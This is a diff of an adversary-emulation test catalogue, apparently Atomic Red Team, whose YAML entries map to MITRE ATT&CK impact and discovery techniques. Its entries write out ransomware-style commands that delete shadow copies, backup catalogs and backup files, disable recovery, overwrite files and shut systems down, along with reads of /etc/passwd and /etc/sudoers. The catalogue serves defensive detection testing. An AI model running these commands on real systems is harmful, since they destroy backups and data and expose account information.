supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -15948,73 +15976,39 @@ impact:
|
|
|
|
|
modified: '2019-07-19T14:34:28.595Z'
|
|
|
|
|
identifier: T1485
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Windows - Delete Volume Shadow Copies
|
|
|
|
|
description: 'Deletes Windows Volume Shadow Copies. This technique is used by
|
|
|
|
|
numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'vssadmin.exe delete shadows /all /quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Delete Windows Backup Catalog
|
|
|
|
|
description: 'Deletes Windows Backup Catalog. This technique is used by numerous
|
|
|
|
|
ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wbadmin.exe delete catalog -quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Disable Windows Recovery Console Repair
|
|
|
|
|
description: |
|
|
|
|
|
Disables repair by the Windows Recovery Console on boot.
|
|
|
|
|
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
|
|
|
|
|
bcdedit.exe /set {default} recoveryenabled no
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
|
|
|
|
|
bcdedit.exe /set {default} recoveryenabled yes
|
|
|
|
|
- name: Windows - Overwrite file with Sysinternals SDelete
|
|
|
|
|
description: |
|
|
|
|
|
Overwrites and deletes a file using Sysinternals SDelete.
|
|
|
|
|
Requires the download of either Sysinternals Suite or the individual SDelete utility.
|
|
|
|
|
Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
|
|
|
|
|
the powershell session along with other information about the file that was deleted.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
sdelete_exe:
|
|
|
|
|
description: Path of sdelete executable
|
|
|
|
|
type: Path
|
|
|
|
|
default: PathToAtomicsFolder\T1485\bin\sdelete.exe
|
|
|
|
|
default: "$env:TEMP\\Sdelete\\sdelete.exe"
|
|
|
|
|
file_to_delete:
|
|
|
|
|
description: Path of file to delete
|
|
|
|
|
type: path
|
|
|
|
|
default: "$env:TEMP\\T1485.txt"
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: Secure delete tool from Sysinternals must exist on disk at specified
|
|
|
|
|
location (#{sdelete_exe})
|
|
|
|
|
prereq_command: 'if (Test-Path #{sdelete_exe}) {0} else {1}'
|
|
|
|
|
prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
|
|
|
|
|
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
|
|
|
|
|
New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
|
|
|
|
|
Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
|
|
|
|
|
Remove-Item $env:TEMP\SDelete.zip -Force
|
|
|
|
|
- description: 'The file to delete must exist at #{file_to_delete}'
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1
|
|
|
|
|
}'
|
|
|
|
|
get_prereq_command: 'New-Item #{file_to_delete} -Force | Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
command: |
|
|
|
|
|
New-Item $env:TEMP\T1485.txt
|
|
|
|
|
#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
|
|
|
|
|
command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: macOS/Linux - Overwrite file with DD
|
|
|
|
|
description: |
|
|
|
|
|
Overwrites and deletes a file using DD.
|
|
|
|
@@ -16035,20 +16029,7 @@ impact:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Delete Backup Files
|
|
|
|
|
description: 'Deletes backup files in a manner similar to Ryuk ransomware.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
|
|
|
|
|
c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -16169,23 +16150,32 @@ impact:
|
|
|
|
|
identifier: T1490
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Windows - Delete Volume Shadow Copies
|
|
|
|
|
description: 'Deletes Windows Volume Shadow Copies. This technique is used by
|
|
|
|
|
numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
description: |
|
|
|
|
|
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
|
|
|
|
|
execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
|
|
|
|
|
will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
|
|
|
|
|
confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: Create volume shadow copy of C:\ . This prereq command only works
|
|
|
|
|
on Windows Server or Windows 8.
|
|
|
|
|
prereq_command: if(!(vssadmin.exe list shadows | findstr "No items found that
|
|
|
|
|
satisfy the query.")) { exit 0 } else { exit 1 }
|
|
|
|
|
get_prereq_command: 'vssadmin.exe create shadow /for=c:'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'vssadmin.exe delete shadows /all /quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Delete Volume Shadow Copies via WMI
|
|
|
|
|
description: 'Deletes Windows Volume Shadow Copies via WMI. This technique is
|
|
|
|
|
used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
Shadow copies can only be created on Windows server or Windows 8.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16193,12 +16183,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wmic.exe shadowcopy delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Delete Windows Backup Catalog
|
|
|
|
|
description: 'Deletes Windows Backup Catalog. This technique is used by numerous
|
|
|
|
|
ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
|
|
|
|
|
"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16206,11 +16195,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wbadmin.exe delete catalog -quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Disable Windows Recovery Console Repair
|
|
|
|
|
description: "Disables repair by the Windows Recovery Console on boot. \nThis
|
|
|
|
|
technique is used by numerous ransomware families and APT malware such as
|
|
|
|
|
Olympic Destroyer.\n"
|
|
|
|
|
description: |
|
|
|
|
|
Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
Upon execution, "The operation completed successfully." will be displayed in the powershell session.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16219,19 +16208,36 @@ impact:
|
|
|
|
|
command: |
|
|
|
|
|
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
|
|
|
|
|
bcdedit.exe /set {default} recoveryenabled no
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
|
|
|
|
|
bcdedit.exe /set {default} recoveryenabled yes
|
|
|
|
|
- name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
|
|
|
|
|
description: "Deletes Windows Volume Shadow Copies with PowerShell code and
|
|
|
|
|
Get-WMIObject. \nThis technique is used by numerous ransomware families such
|
|
|
|
|
as Sodinokibi/REvil.\nExecutes Get-WMIObject \n"
|
|
|
|
|
description: |
|
|
|
|
|
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
|
|
|
|
|
This technique is used by numerous ransomware families such as Sodinokibi/REvil.
|
|
|
|
|
Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution
|
|
|
|
|
there may be no output displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Delete Backup Files
|
|
|
|
|
description: |
|
|
|
|
|
Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
|
|
|
|
|
to delete files from around the system.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object
|
|
|
|
|
{$_.Delete();}"
|
|
|
|
|
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
|
|
|
|
|
c:\backup*.* c:\*.set c:\*.win c:\*.dsk
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1496:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -16307,7 +16313,7 @@ impact:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'yes > /dev/null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1489:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -16377,9 +16383,10 @@ impact:
|
|
|
|
|
identifier: T1489
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Windows - Stop service using Service Controller
|
|
|
|
|
description: 'Stops a specified service using the sc.exe command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying
|
|
|
|
|
it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be
|
|
|
|
|
started by running the cleanup command.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16392,14 +16399,15 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'sc.exe stop #{service_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sc.exe start #{service_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Stop service using net.exe
|
|
|
|
|
description: 'Stops a specified service using the net.exe command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully."
|
|
|
|
|
will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be
|
|
|
|
|
started by running the cleanup command.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16412,13 +16420,16 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'net.exe stop #{service_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'net.exe start #{service_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Stop service by killing process
|
|
|
|
|
description: "Stops a specified service killng the service's process. \nThis
|
|
|
|
|
technique was used by WannaCry.\n"
|
|
|
|
|
description: |
|
|
|
|
|
Stops a specified service killng the service's process.
|
|
|
|
|
This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated."
|
|
|
|
|
will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be
|
|
|
|
|
started by running the cleanup command.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16431,7 +16442,7 @@ impact:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'taskkill.exe /f /im #{process_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1529:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -16490,7 +16501,7 @@ impact:
|
|
|
|
|
- name: Shutdown System - Windows
|
|
|
|
|
description: 'This test shuts down a Windows system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16503,11 +16514,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'shutdown /s /t #{timeout}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Restart System - Windows
|
|
|
|
|
description: 'This test restarts a Windows system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16520,11 +16531,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'shutdown /r /t #{timeout}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Restart System via `shutdown` - macOS/Linux
|
|
|
|
|
description: 'This test restarts a macOS/Linux system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -16538,11 +16549,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'shutdown -r #{timeout}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Shutdown System via `shutdown` - macOS/Linux
|
|
|
|
|
description: 'This test shuts down a macOS/Linux system using a halt.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -16556,11 +16567,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'shutdown -h #{timeout}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Restart System via `reboot` - macOS/Linux
|
|
|
|
|
description: 'This test restarts a macOS/Linux system via `reboot`.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -16569,11 +16580,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'reboot
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Shutdown System via `halt` - Linux
|
|
|
|
|
description: 'This test shuts down a Linux system using `halt`.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -16583,7 +16594,7 @@ impact:
|
|
|
|
|
- name: Reboot System via `halt` - Linux
|
|
|
|
|
description: 'This test restarts a Linux system using `halt`.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -16593,7 +16604,7 @@ impact:
|
|
|
|
|
- name: Shutdown System via `poweroff` - Linux
|
|
|
|
|
description: 'This test shuts down a Linux system using `poweroff`.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -16603,7 +16614,7 @@ impact:
|
|
|
|
|
- name: Reboot System via `poweroff` - Linux
|
|
|
|
|
description: 'This test restarts a Linux system using `poweroff`.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -16705,7 +16716,7 @@ discovery:
|
|
|
|
|
- name: Enumerate all accounts
|
|
|
|
|
description: 'Enumerate all accounts by copying /etc/passwd to another file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -16718,7 +16729,7 @@ discovery:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'cat /etc/passwd > #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: View sudoers access
|
|
|
|
|
description: "(requires root)\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
@@ -16733,11 +16744,11 @@ discovery:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'cat /etc/sudoers > #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: View accounts with UID 0
|
|
|
|
|
description: 'View accounts wtih UID 0
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -16750,11 +16761,11 @@ discovery:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'grep ''x:0:'' /etc/passwd > #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: List opened files by user
|
|
|
|
|
description: 'List opened files by user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -16762,11 +16773,11 @@ discovery:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'username=$(echo $HOME | awk -F''/'' ''{print $3}'') && lsof -u $username
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Show if a user account has ever logged in remotely
|
|
|
|
|
description: 'Show if a user account has ever logged in remotely
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16778,11 +16789,11 @@ discovery:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'lastlog > #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Enumerate users and groups
|
|
|
|
|
description: 'Utilize groups and id to enumerate users and groups
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -16794,7 +16805,7 @@ discovery:
|
|
|
|
|
- name: Enumerate users and groups
|
|
|
|
|
description: 'Utilize local utilities to enumerate users and groups
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -16824,7 +16835,7 @@ discovery:
|
|
|
|
|
- name: Enumerate all accounts via PowerShell
|
|
|
|
|
description: 'Enumerate all accounts via PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16845,7 +16856,7 @@ discovery:
|
|
|
|
|
- name: Enumerate logged on users
|
|
|
|
|
description: 'Enumerate logged on users
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16853,11 +16864,11 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'query user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Enumerate logged on users via PowerShell
|
|
|
|
|
description: 'Enumerate logged on users via PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16865,7 +16876,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'query user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1010:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -16934,7 +16945,7 @@ discovery:
|
|
|
|
|
#{output_file_name}
|
|
|
|
|
cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1217:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -16982,7 +16993,7 @@ discovery:
|
|
|
|
|
description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions)
|
|
|
|
|
that contains bookmarks and lists any found instances to a text file.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -16990,12 +17001,12 @@ discovery:
|
|
|
|
|
command: 'find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >>
|
|
|
|
|
/tmp/firefox-bookmarks.txt \;
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: List Mozilla Firefox Bookmark Database Files on macOS
|
|
|
|
|
description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS)
|
|
|
|
|
that contains bookmarks and lists any found instances to a text file.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -17003,12 +17014,12 @@ discovery:
|
|
|
|
|
command: 'find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {}
|
|
|
|
|
>> /tmp/firefox-bookmarks.txt \;
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: List Google Chrome Bookmark JSON Files on macOS
|
|
|
|
|
description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains
|
|
|
|
|
bookmarks in JSON format and lists any found instances to a text file.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -17016,31 +17027,31 @@ discovery:
|
|
|
|
|
command: 'find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/chrome-bookmarks.txt
|
|
|
|
|
\;
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: List Google Chrome Bookmarks on Windows with powershell
|
|
|
|
|
description: 'Searches for Google Chromes''s Bookmarks file (on Windows distributions)
|
|
|
|
|
that contains bookmarks.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
command: 'where.exe /R C:\Users\ Bookmarks
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: List Google Chrome Bookmarks on Windows with command prompt
|
|
|
|
|
description: 'Searches for Google Chromes''s Bookmarks file (on Windows distributions)
|
|
|
|
|
that contains bookmarks.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'where /R C:\Users\ Bookmarks
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -17117,7 +17128,7 @@ discovery:
|
|
|
|
|
or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
|
|
|
|
|
especially in a short period of time, may aid in detection.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
|
|
|
|
x_mitre_contributors:
|
|
|
|
|
- Sunny Neo
|
|
|
|
@@ -17245,7 +17256,7 @@ discovery:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr *
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Discover domain trusts with nltest
|
|
|
|
|
description: |
|
|
|
|
|
Uses the nltest command to discover domain trusts.
|
|
|
|
@@ -17257,11 +17268,11 @@ discovery:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'nltest /domain_trusts
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell enumerate domains and forests
|
|
|
|
|
description: 'Use powershell to enumerate AD information
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -17326,9 +17337,9 @@ discovery:
|
|
|
|
|
identifier: T1083
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: File and Directory Discovery (cmd.exe)
|
|
|
|
|
description: 'Find or discover files on the file system
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
|
|
|
|
|
all of the data discovery commands.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -17338,15 +17349,15 @@ discovery:
|
|
|
|
|
dir /s c:\ >> %temp%\download
|
|
|
|
|
dir /s "c:\Documents and Settings" >> %temp%\download
|
|
|
|
|
dir /s "c:\Program Files\" >> %temp%\download
|
|
|
|
|
dir /s d:\ >> %temp%\download
|
|
|
|
|
dir "%systemdrive%\Users\*.*" >> %temp%\download
|
|
|
|
|
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
|
|
|
|
|
dir "%userprofile%\Desktop\*.*" >> %temp%\download
|
|
|
|
|
tree /F >> %temp%\download
|
|
|
|
|
- name: File and Directory Discovery (PowerShell)
|
|
|
|
|
description: 'Find or discover files on the file system
|
|
|
|
|
description: 'Find or discover files on the file system. Upon execution, file
|
|
|
|
|
and folder information will be displayed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -17381,7 +17392,7 @@ discovery:
|
|
|
|
|
- name: Nix File and Directory Discovery 2
|
|
|
|
|
description: 'Find or discover files on the file system
|
|
|
|
|
|
|
|
|
|
